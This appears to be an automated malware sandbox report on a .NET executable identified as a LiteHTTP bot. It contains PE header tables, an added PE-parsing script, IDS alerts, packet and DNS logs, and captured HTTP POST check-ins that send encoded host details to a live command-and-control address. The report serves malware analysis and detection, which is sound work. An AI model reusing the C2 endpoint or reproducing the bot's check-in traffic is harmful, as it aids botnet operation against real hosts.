                          SHA1:6b804aad52f0dfda2303dde5c0e641bb20f14fc2
                          SHA256:71cfdbe5a32fb5cb2a5eff926c8b9000b231f4990b258872e7cf3a0e4c46bccf
                          SHA512:8a331ce713f81bc3050e80cbca8d6e305ede44e28684dbca4e59c2e5ff7d0a05ad50f65dc4d2258fa64110030ec4f9acbcf5d3e6ba273345be4fb00c6016eb35
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          TLSH:0B032A0863DC8753E2EF5BB89C7546054771A227EA23F74E2DCCB0D919A73898E407A7
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0.................. ........@.. ....................................`................................
                          Icon Hash:00928e8e8686b000
                          Entrypoint:0x40a88e
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x6787E2E7 [Wed Jan 15 16:31:35 2025 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                          Instruction
                          jmp dword ptr [00402000h]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa83c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x608 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xa704 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x8894 | 0x8a00 | 5b02882ffa32bbb336d9612e2f8580cf | False | 0.4782325634057971 | data | 5.656924457038294 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0x608 | 0x800 | de2bde659b3e75e047cb6b1cae165656 | False | 0.32958984375 | data | 3.445679059183643 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe000 | 0xc | 0x200 | 37ec8b9403511a13b67b13edb5115722 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xc090 | 0x378 | data | | | 0.4155405405405405
RT_MANIFEST | 0xc418 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
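How the three tables above fit together, as an added example (not Joe Sandbox code): the only import is mscoree.dll!_CorExeMain and IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR is non-empty (0x2008, 0x48 bytes), which is the layout of a .NET executable, where IL and metadata live inside .text behind a one-entry IAT; that is why the ETPRO rule names in the alert table say MSIL. The script builds a header-only PE32 from the directory and section values in the tables, walks it the way a PE parser would, reproduces the "Is in Section" column by mapping each directory RVA onto the section table, and applies the COM-descriptor check. Entry point, image base and timestamp in the constructed header are placeholders, not values read from random.exe. The first 256 bytes of anubis.exe dumped at the end of this section (machine 0x14c, 3 sections, magic 0x10b, entry point 0xa88e) go through the same parser but stop short of the directory table, so only the COFF and optional-header fields can be read from that dump.

```python
"""Walk a PE32 header: data directories, section mapping and the .NET check.

Added example, not Joe Sandbox code. build_sample_pe() constructs a header-only
image from the directory and section values in the tables above; entry point,
image base and timestamp in it are placeholders, not values read from random.exe.
"""
import struct

DIRECTORY_NAMES = [
    "EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
    "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
    "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED",
]

# (name, virtual address, virtual size, raw size, characteristics) from the section table
SAMPLE_SECTIONS = [
    (".text", 0x2000, 0x8894, 0x8A00, 0x60000020),   # CNT_CODE | MEM_EXECUTE | MEM_READ
    (".rsrc", 0xC000, 0x0608, 0x0800, 0x40000040),   # CNT_INITIALIZED_DATA | MEM_READ
    (".reloc", 0xE000, 0x000C, 0x0200, 0x42000040),  # CNT_INITIALIZED_DATA | MEM_DISCARDABLE | MEM_READ
]
# directory index -> (rva, size) from the data directory table; entries not listed are 0/0
SAMPLE_DIRECTORIES = {1: (0xA83C, 0x4F), 2: (0xC000, 0x608), 5: (0xE000, 0xC),
                      6: (0xA704, 0x1C), 12: (0x2000, 0x8), 14: (0x2008, 0x48)}


def build_sample_pe():
    """Constructed header-only PE32: DOS header, COFF header, optional header, section table."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)                        # e_lfanew -> "PE\0\0"
    coff = struct.pack("<IHHIIIHH", 0x4550, 0x14C, len(SAMPLE_SECTIONS),
                       0x6787E2E7, 0, 0, 0xE0, 0x0102)              # i386, 3 sections, EXECUTABLE|32BIT
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    struct.pack_into("<I", opt, 16, 0xA88E)                        # AddressOfEntryPoint (placeholder)
    struct.pack_into("<I", opt, 28, 0x400000)                      # ImageBase (placeholder)
    struct.pack_into("<I", opt, 92, 16)                            # NumberOfRvaAndSizes
    for idx, (rva, size) in SAMPLE_DIRECTORIES.items():
        struct.pack_into("<II", opt, 96 + 8 * idx, rva, size)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode(), vsize, va, rsize, 0, 0, 0, 0, 0, chars)
        for name, va, vsize, rsize, chars in SAMPLE_SECTIONS)
    return bytes(dos) + coff + bytes(opt) + table


def parse_pe(data):
    """MZ -> PE signature -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    sig, machine, nsect, stamp, _, _, opt_size, _flags = struct.unpack_from("<IHHIIIHH", data, e_lfanew)
    if sig != 0x4550:
        raise ValueError("bad PE signature")
    opt = e_lfanew + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:           # PE32+ (0x20B) shifts the later fields
        raise ValueError("only PE32 handled here")
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    directories = {DIRECTORY_NAMES[i]: struct.unpack_from("<II", data, opt + 96 + 8 * i)
                   for i in range(min(ndirs, 16))}
    sections, off = [], opt + opt_size
    for _ in range(nsect):
        name, vsize, va, rsize, *_ptrs, chars = struct.unpack_from("<8sIIIIIIHHI", data, off)
        sections.append((name.rstrip(b"\0").decode(), va, vsize, rsize, chars))
        off += 40
    return {"machine": machine, "timestamp": stamp, "directories": directories, "sections": sections}


def section_for_rva(sections, rva):
    """Section whose range covers rva; the larger of virtual and raw size is used, a common tool heuristic."""
    for name, va, vsize, rsize, _ in sections:
        if va <= rva < va + max(vsize, rsize):
            return name
    return None


def directory_report(pe):
    """The 'Is in Section' column: name -> (rva, size, section); empty entries map to None."""
    return {name: (rva, size, section_for_rva(pe["sections"], rva) if rva else None)
            for name, (rva, size) in pe["directories"].items()}


def is_dotnet(pe):
    """Managed images carry a 0x48-byte CLR header in COM_DESCRIPTOR; mscoree!_CorExeMain is the only native import."""
    rva, size = pe["directories"]["COM_DESCRIPTOR"]
    return rva != 0 and size >= 0x48
```

The COM-descriptor test is the reliable one: a 32-bit .NET executable that has been re-stubbed or renamed still needs that header, while the mscoree import can be hidden by a native loader. Run the same parser over a dropped file to compare its section layout with the table above.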
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-15T18:11:02.890852+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.9 | 59239 | 87.120.126.5 | 80 | TCP
2025-01-15T18:11:03.186880+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.9 | 59239 | 87.120.126.5 | 80 | TCP
2025-01-15T18:11:03.186880+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.9 | 59239 | 87.120.126.5 | 80 | TCP
2025-01-15T18:11:05.693290+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.9 | 59239 | 87.120.126.5 | 80 | TCP
2025-01-15T18:11:05.950275+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.9 | 59239 | 87.120.126.5 | 80 | TCP
2025-01-15T18:11:05.950275+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.9 | 59239 | 87.120.126.5 | 80 | TCP
2025-01-15T18:11:06.123167+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.9 | 59239 | 87.120.126.5 | 80 | TCP
2025-01-15T18:11:06.343152+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.9 | 59239 | 87.120.126.5 | 80 | TCP
2025-01-15T18:11:06.343152+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.9 | 59239 | 87.120.126.5 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 15, 2025 18:10:41.945537090 CET | 59230 | 53 | 192.168.2.9 | 162.159.36.2
Jan 15, 2025 18:10:41.950320959 CET | 53 | 59230 | 162.159.36.2 | 192.168.2.9
Jan 15, 2025 18:10:41.950413942 CET | 59230 | 53 | 192.168.2.9 | 162.159.36.2
Jan 15, 2025 18:10:41.955367088 CET | 53 | 59230 | 162.159.36.2 | 192.168.2.9
Jan 15, 2025 18:10:42.406455994 CET | 59230 | 53 | 192.168.2.9 | 162.159.36.2
Jan 15, 2025 18:10:42.411478043 CET | 53 | 59230 | 162.159.36.2 | 192.168.2.9
Jan 15, 2025 18:10:42.411540031 CET | 59230 | 53 | 192.168.2.9 | 162.159.36.2
Jan 15, 2025 18:11:02.396034002 CET | 59239 | 80 | 192.168.2.9 | 87.120.126.5
Jan 15, 2025 18:11:02.538949013 CET | 80 | 59239 | 87.120.126.5 | 192.168.2.9
Jan 15, 2025 18:11:02.539056063 CET | 59239 | 80 | 192.168.2.9 | 87.120.126.5
Jan 15, 2025 18:11:02.539299965 CET | 59239 | 80 | 192.168.2.9 | 87.120.126.5
Jan 15, 2025 18:11:02.544061899 CET | 80 | 59239 | 87.120.126.5 | 192.168.2.9
Jan 15, 2025 18:11:02.890851974 CET | 59239 | 80 | 192.168.2.9 | 87.120.126.5
Jan 15, 2025 18:11:02.895908117 CET | 80 | 59239 | 87.120.126.5 | 192.168.2.9
Jan 15, 2025 18:11:03.143078089 CET | 80 | 59239 | 87.120.126.5 | 192.168.2.9
Jan 15, 2025 18:11:03.186880112 CET | 59239 | 80 | 192.168.2.9 | 87.120.126.5
Jan 15, 2025 18:11:03.276634932 CET | 80 | 59239 | 87.120.126.5 | 192.168.2.9
Jan 15, 2025 18:11:03.327486038 CET | 59239 | 80 | 192.168.2.9 | 87.120.126.5
Jan 15, 2025 18:11:03.428124905 CET | 59240 | 80 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:03.433022022 CET | 80 | 59240 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:03.433114052 CET | 59240 | 80 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:03.437057972 CET | 59240 | 80 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:03.441881895 CET | 80 | 59240 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:04.169414997 CET | 80 | 59240 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:04.171045065 CET | 59241 | 443 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:04.171102047 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:04.171180964 CET | 59241 | 443 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:04.183038950 CET | 59241 | 443 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:04.183057070 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:04.218164921 CET | 59240 | 80 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:04.678117037 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:04.678313017 CET | 59241 | 443 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:04.680404902 CET | 59241 | 443 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:04.680427074 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:04.680808067 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:04.733758926 CET | 59241 | 443 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:04.742912054 CET | 59241 | 443 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:04.783339024 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.394527912 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.394625902 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.394656897 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.394686937 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.394720078 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.394722939 CET | 59241 | 443 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:05.394745111 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.394803047 CET | 59241 | 443 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:05.394803047 CET | 59241 | 443 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:05.394814014 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.394910097 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.398807049 CET | 59241 | 443 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:05.398813963 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.399307013 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.399349928 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.399394989 CET | 59241 | 443 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:05.399401903 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.402787924 CET | 59241 | 443 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:05.487871885 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.487942934 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.487977982 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.488008976 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.488064051 CET | 59241 | 443 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:05.488099098 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.488112926 CET | 59241 | 443 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:05.488202095 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.488230944 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.488275051 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.488290071 CET | 59241 | 443 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:05.488297939 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.488308907 CET | 59241 | 443 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:05.489065886 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.489099979 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.489126921 CET | 59241 | 443 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:05.489132881 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.489165068 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.489193916 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.489206076 CET | 59241 | 443 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:05.489211082 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.489250898 CET | 59241 | 443 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:05.490011930 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.490072012 CET | 59241 | 443 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:05.490077019 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.490119934 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.490206957 CET | 443 | 59241 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.490257978 CET | 59241 | 443 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:05.493446112 CET | 59241 | 443 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:05.520499945 CET | 59239 | 80 | 192.168.2.9 | 87.120.126.5
Jan 15, 2025 18:11:05.525440931 CET | 80 | 59239 | 87.120.126.5 | 192.168.2.9
Jan 15, 2025 18:11:05.693058014 CET | 80 | 59239 | 87.120.126.5 | 192.168.2.9
Jan 15, 2025 18:11:05.693289995 CET | 59239 | 80 | 192.168.2.9 | 87.120.126.5
Jan 15, 2025 18:11:05.698153973 CET | 80 | 59239 | 87.120.126.5 | 192.168.2.9
Jan 15, 2025 18:11:05.949556112 CET | 80 | 59239 | 87.120.126.5 | 192.168.2.9
Jan 15, 2025 18:11:05.950274944 CET | 59239 | 80 | 192.168.2.9 | 87.120.126.5
Jan 15, 2025 18:11:05.950445890 CET | 59240 | 80 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:05.955037117 CET | 80 | 59239 | 87.120.126.5 | 192.168.2.9
Jan 15, 2025 18:11:05.955831051 CET | 80 | 59240 | 104.21.21.16 | 192.168.2.9
Jan 15, 2025 18:11:05.955914974 CET | 59240 | 80 | 192.168.2.9 | 104.21.21.16
Jan 15, 2025 18:11:06.122931957 CET | 80 | 59239 | 87.120.126.5 | 192.168.2.9
Jan 15, 2025 18:11:06.123167038 CET | 59239 | 80 | 192.168.2.9 | 87.120.126.5
Jan 15, 2025 18:11:06.127976894 CET | 80 | 59239 | 87.120.126.5 | 192.168.2.9
Jan 15, 2025 18:11:06.301155090 CET | 80 | 59239 | 87.120.126.5 | 192.168.2.9
Jan 15, 2025 18:11:06.343152046 CET | 59239 | 80 | 192.168.2.9 | 87.120.126.5
Jan 15, 2025 18:11:06.399295092 CET | 59239 | 80 | 192.168.2.9 | 87.120.126.5
Jan 15, 2025 18:11:06.689896107 CET | 80 | 59239 | 87.120.126.5 | 192.168.2.9
Jan 15, 2025 18:11:06.689961910 CET | 59239 | 80 | 192.168.2.9 | 87.120.126.5
Jan 15, 2025 18:11:51.075861931 CET | 59243 | 80 | 192.168.2.9 | 87.120.126.5
Jan 15, 2025 18:11:51.230433941 CET | 59244 | 80 | 192.168.2.9 | 87.120.126.5
Jan 15, 2025 18:11:52.077617884 CET | 59243 | 80 | 192.168.2.9 | 87.120.126.5
Jan 15, 2025 18:11:52.218223095 CET | 59244 | 80 | 192.168.2.9 | 87.120.126.5
Jan 15, 2025 18:11:54.077651024 CET | 59243 | 80 | 192.168.2.9 | 87.120.126.5
Jan 15, 2025 18:11:54.218386889 CET | 59244 | 80 | 192.168.2.9 | 87.120.126.5
Jan 15, 2025 18:11:58.077642918 CET | 59243 | 80 | 192.168.2.9 | 87.120.126.5
Jan 15, 2025 18:11:58.218322039 CET | 59244 | 80 | 192.168.2.9 | 87.120.126.5
Jan 15, 2025 18:12:05.117979050 CET | 59245 | 80 | 192.168.2.9 | 87.120.126.5
Jan 15, 2025 18:12:06.077642918 CET | 59243 | 80 | 192.168.2.9 | 87.120.126.5
Jan 15, 2025 18:12:06.124514103 CET | 59245 | 80 | 192.168.2.9 | 87.120.126.5
Jan 15, 2025 18:12:06.218337059 CET | 59244 | 80 | 192.168.2.9 | 87.120.126.5
Jan 15, 2025 18:12:08.124506950 CET | 59245 | 80 | 192.168.2.9 | 87.120.126.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 15, 2025 18:10:41.944142103 CET | 53 | 52959 | 162.159.36.2 | 192.168.2.9
Jan 15, 2025 18:10:42.708591938 CET | 53 | 59874 | 1.1.1.1 | 192.168.2.9
Jan 15, 2025 18:11:03.405869007 CET | 52288 | 53 | 192.168.2.9 | 1.1.1.1
Jan 15, 2025 18:11:03.416121006 CET | 53 | 52288 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jan 15, 2025 18:11:05.618480921 CET | 192.168.2.9 | 1.1.1.1 | 4d5a | | Echo
Jan 15, 2025 18:11:05.624819994 CET | 1.1.1.1 | 192.168.2.9 | 555a | | Echo Reply
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 15, 2025 18:11:03.405869007 CET | 192.168.2.9 | 1.1.1.1 | 0x78fc | Standard query (0) | tmpfiles.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 15, 2025 18:09:57.002959967 CET | 1.1.1.1 | 192.168.2.9 | 0x3d8a | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 15, 2025 18:09:57.002959967 CET | 1.1.1.1 | 192.168.2.9 | 0x3d8a | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:11:03.416121006 CET | 1.1.1.1 | 192.168.2.9 | 0x78fc | No error (0) | tmpfiles.org | | 104.21.21.16 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:11:03.416121006 CET | 1.1.1.1 | 192.168.2.9 | 0x78fc | No error (0) | tmpfiles.org | | 172.67.195.247 | A (IP address) | IN (0x0001) | false
                          • tmpfiles.org
                          • 87.120.126.5
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 59239 | 87.120.126.5 | 80 | 1380 | C:\Users\user\Desktop\random.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 18:11:02.539299965 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
Host: 87.120.126.5
Content-Length: 367
Expect: 100-continue
Connection: Keep-Alive
Jan 15, 2025 18:11:02.890851974 CET | 367 | OUT | Data Raw: 69 64 3d 6c 72 36 6e 6e 62 4a 65 55 2f 6c 54 61 54 4a 4e 7e 39 33 4b 59 7a 53 77 6a 54 72 7a 31 35 52 52 59 58 62 71 54 43 34 4d 7a 35 77 45 67 52 64 43 6a 7a 38 7a 42 30 6f 6f 7e 62 7e 4a 70 4d 77 47 78 53 32 52 62 43 4d 63 68 34 69 7a 30 61 6d
Data Ascii: id=lr6nnbJeU/lTaTJN~93KYzSwjTrz15RRYXbqTC4Mz5wEgRdCjz8zB0oo~b~JpMwGxS2RbCMch4iz0am7a3LcHgYL2T1bp1x4fhdSFg~5D9I=&os=rNDO65DvThI/Duzyf3MHA5RTsMmgdriu18kvAFToiz4=&pv=JdempBntA1DrujVGIs8Kcw==&ip=aOdxIYFMknrHsOX2fI~iXHdh4ovh9fvfkn2afeZTykc8G1h70j7w
Jan 15, 2025 18:11:03.143078089 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 15, 2025 18:11:03.276634932 CET | 309 | IN | HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Wed, 15 Jan 2025 17:11:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 30 0d 0a 38 33 31 5a 48 63 76 38 4c 51 57 66 74 74 41 39 49 53 33 30 33 59 4c 76 79 54 77 4e 34 73 62 65 54 59 36 43 6b 44 79 77 45 77 4b 71 61 4f 37 47 61 4b 74 48 78 48 38 4d 6b 45 4a 61 6e 41 33 4d 4e 6d 72 7a 75 46 74 4f 75 5a 61 44 4b 42 65 76 47 32 2f 69 62 50 2b 45 43 39 71 35 48 66 63 34 69 71 7a 6b 47 30 4b 6e 53 51 47 54 36 54 37 70 49 6c 47 63 50 50 36 42 72 43 75 76 74 6a 64 4f 0d 0a 30 0d 0a 0d 0a
Data Ascii: 80831ZHcv8LQWfttA9IS303YLvyTwN4sbeTY6CkDywEwKqaO7GaKtHxH8MkEJanA3MNmrzuFtOuZaDKBevG2/ibP+EC9q5Hfc4iqzkG0KnSQGT6T7pIlGcPP6BrCuvtjdO0
Jan 15, 2025 18:11:05.520499945 CET | 194 | OUT | POST /VmCetSC7/page.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
Host: 87.120.126.5
Content-Length: 423
Expect: 100-continue
Jan 15, 2025 18:11:05.693058014 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 15, 2025 18:11:05.693289995 CET | 423 | OUT | Data Raw: 69 64 3d 6c 72 36 6e 6e 62 4a 65 55 2f 6c 54 61 54 4a 4e 7e 39 33 4b 59 7a 53 77 6a 54 72 7a 31 35 52 52 59 58 62 71 54 43 34 4d 7a 35 77 45 67 52 64 43 6a 7a 38 7a 42 30 6f 6f 7e 62 7e 4a 70 4d 77 47 78 53 32 52 62 43 4d 63 68 34 69 7a 30 61 6d
Data Ascii: id=lr6nnbJeU/lTaTJN~93KYzSwjTrz15RRYXbqTC4Mz5wEgRdCjz8zB0oo~b~JpMwGxS2RbCMch4iz0am7a3LcHgYL2T1bp1x4fhdSFg~5D9I=&os=rNDO65DvThI/Duzyf3MHA5RTsMmgdriu18kvAFToiz4=&pv=JdempBntA1DrujVGIs8Kcw==&ip=aOdxIYFMknrHsOX2fI~iXHdh4ovh9fvfkn2afeZTykc8G1h70j7w
Jan 15, 2025 18:11:05.949556112 CET | 175 | IN | HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Wed, 15 Jan 2025 17:11:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Jan 15, 2025 18:11:05.950274944 CET | 194 | OUT | POST /VmCetSC7/page.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
Host: 87.120.126.5
Content-Length: 396
Expect: 100-continue
Jan 15, 2025 18:11:06.122931957 CET | 25 | IN | HTTP/1.1 100 Continue
